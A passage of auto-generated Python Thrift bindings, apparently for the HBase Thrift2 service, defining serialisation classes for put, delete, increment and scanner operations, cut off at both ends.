None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.BOOL: self.success = iprot.readBool(); else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('checkAndPut_result') if self.success is not None: oprot.writeFieldBegin('success', TType.BOOL, 0) oprot.writeBool(self.success) oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class putMultiple_args: """ Attributes: - table: the table to put data in - puts: a list of TPuts to commit """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.LIST, 'puts', (TType.STRUCT,(TPut, TPut.thrift_spec)), None, ), # 2 ) def __init__(self, table=None, puts=None,): self.table = table self.puts = puts def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.LIST: self.puts = [] (_etype59, _size56) = iprot.readListBegin() for _i60 in xrange(_size56): _elem61 = TPut() _elem61.read(iprot) self.puts.append(_elem61) iprot.readListEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('putMultiple_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.puts is not None: oprot.writeFieldBegin('puts', TType.LIST, 2) oprot.writeListBegin(TType.STRUCT, len(self.puts)) for iter62 in self.puts: iter62.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.puts is None: raise TProtocol.TProtocolException(message='Required field puts is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class putMultiple_result: """ Attributes: - io """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, io=None,): self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('putMultiple_result') if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class deleteSingle_args: """ Attributes: - table: the table to delete from - deleteSingle: the TDelete to delete """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 2 ) def __init__(self, table=None, deleteSingle=None,): self.table = table self.deleteSingle = deleteSingle def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.deleteSingle = TDelete() self.deleteSingle.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deleteSingle_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.deleteSingle is not None: oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 2) self.deleteSingle.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.deleteSingle is None: raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class deleteSingle_result: """ Attributes: - io """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, io=None,): self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deleteSingle_result') if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class deleteMultiple_args: """ Attributes: - table: the table to delete from - deletes: list of TDeletes to delete """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.LIST, 'deletes', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 2 ) def __init__(self, table=None, deletes=None,): self.table = table self.deletes = deletes def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.LIST: self.deletes = [] (_etype66, _size63) = iprot.readListBegin() for _i67 in xrange(_size63): _elem68 = TDelete() _elem68.read(iprot) self.deletes.append(_elem68) iprot.readListEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deleteMultiple_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.deletes is not None: oprot.writeFieldBegin('deletes', TType.LIST, 2) oprot.writeListBegin(TType.STRUCT, len(self.deletes)) for iter69 in self.deletes: iter69.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.deletes is None: raise TProtocol.TProtocolException(message='Required field deletes is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class deleteMultiple_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.LIST, 'success', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_etype73, _size70) = iprot.readListBegin() for _i74 in xrange(_size70): _elem75 = TDelete() _elem75.read(iprot) self.success.append(_elem75) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deleteMultiple_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRUCT, len(self.success)) for iter76 in self.success: iter76.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class checkAndDelete_args: """ Attributes: - table: to check in and delete from - row: row to check - family: column family to check - qualifier: column qualifier to check - value: the expected value, if not provided the check is for the non-existence of the column in question - deleteSingle: the TDelete to execute if the check succeeds """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRING, 'row', None, None, ), # 2 (3, TType.STRING, 'family', None, None, ), # 3 (4, TType.STRING, 'qualifier', None, None, ), # 4 (5, TType.STRING, 'value', None, None, ), # 5 (6, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 6 ) def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, deleteSingle=None,): self.table = table self.row = row self.family = family self.qualifier = qualifier self.value = value self.deleteSingle = deleteSingle def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.row = iprot.readString(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.family = iprot.readString(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRING: self.qualifier = iprot.readString(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRING: self.value = iprot.readString(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRUCT: self.deleteSingle = TDelete() self.deleteSingle.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('checkAndDelete_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.row is not None: oprot.writeFieldBegin('row', TType.STRING, 2) oprot.writeString(self.row) oprot.writeFieldEnd() if self.family is not None: oprot.writeFieldBegin('family', TType.STRING, 3) oprot.writeString(self.family) oprot.writeFieldEnd() if self.qualifier is not None: oprot.writeFieldBegin('qualifier', TType.STRING, 4) oprot.writeString(self.qualifier) oprot.writeFieldEnd() if self.value is not None: oprot.writeFieldBegin('value', TType.STRING, 5) oprot.writeString(self.value) oprot.writeFieldEnd() if self.deleteSingle is not None: oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 6) self.deleteSingle.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.row is None: raise TProtocol.TProtocolException(message='Required field row is unset!') if self.family is None: raise TProtocol.TProtocolException(message='Required field family is unset!') if self.qualifier is None: raise TProtocol.TProtocolException(message='Required field qualifier is unset!') if self.deleteSingle is None: raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class checkAndDelete_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.BOOL, 'success', None, None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.BOOL: self.success = iprot.readBool(); else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('checkAndDelete_result') if self.success is not None: oprot.writeFieldBegin('success', TType.BOOL, 0) oprot.writeBool(self.success) oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class increment_args: """ Attributes: - table: the table to increment the value on - increment: the TIncrement to increment """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRUCT, 'increment', (TIncrement, TIncrement.thrift_spec), None, ), # 2 ) def __init__(self, table=None, increment=None,): self.table = table self.increment = increment def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.increment = TIncrement() self.increment.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('increment_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.increment is not None: oprot.writeFieldBegin('increment', TType.STRUCT, 2) self.increment.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.increment is None: raise TProtocol.TProtocolException(message='Required field increment is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class increment_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = TResult() self.success.read(iprot) else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('increment_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class openScanner_args: """ Attributes: - table: the table to get the Scanner for - scan: the scan object to get a Scanner for """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRUCT, 'scan', (TScan, TScan.thrift_spec), None, ), # 2 ) def __init__(self, table=None, scan=None,): self.table = table self.scan = scan def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.scan = TScan() self.scan.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('openScanner_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.scan is not None: oprot.writeFieldBegin('scan', TType.STRUCT, 2) self.scan.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.scan is None: raise TProtocol.TProtocolException(message='Required field scan is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class openScanner_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.I32, 'success', None, None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.I32: self.success = iprot.readI32(); else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('openScanner_result') if self.success is not None: oprot.writeFieldBegin('success', TType.I32, 0) oprot.writeI32(self.success) oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getScannerRows_args: """ Attributes: - scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function. - numRows: number of rows to return """ thrift_spec = ( None, # 0 (1, TType.I32, 'scannerId', None, None, ), # 1 (2, TType.I32, 'numRows', None, 1, ), # 2 ) def __init__(self, scannerId=None, numRows=thrift_spec[2][4],): self.scannerId = scannerId self.numRows = numRows def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.scannerId = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.numRows = iprot.readI32(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getScannerRows_args') if self.scannerId is not None: oprot.writeFieldBegin('scannerId', TType.I32, 1) oprot.writeI32(self.scannerId) oprot.writeFieldEnd() if self.numRows is not None: oprot.writeFieldBegin('numRows', TType.I32, 2) oprot.writeI32(self.numRows) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.scannerId is None: raise TProtocol.TProtocolException(message='Required field scannerId is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getScannerRows_result: """ Attributes: - success - io - ia: if the scannerId is invalid """ thrift_spec = ( (0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2 ) def __init__(self, success=None, io=None, ia=None,): self.success = success self.io = io self.ia = ia def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_etype80, _size77) = iprot.readListBegin() for _i81 in xrange(_size77): _elem82 = TResult() _elem82.read(iprot) self.success.append(_elem82) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.ia = TIllegalArgument() self.ia.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getScannerRows_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRUCT, len(self.success)) for iter83 in self.success: iter83.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() if self.ia is not None: oprot.writeFieldBegin('ia', TType.STRUCT, 2) self.ia.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class closeScanner_args: """ Attributes: - scannerId: the Id of the Scanner to close * """ thrift_spec = ( None, # 0 (1, TType.I32, 'scannerId', None, None, ), # 1 ) def __init__(self, scannerId=None,): self.scannerId = scannerId def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.scannerId = iprot.readI32(); else: iprot.skip(ftype) else: iprot.skip(ftype) 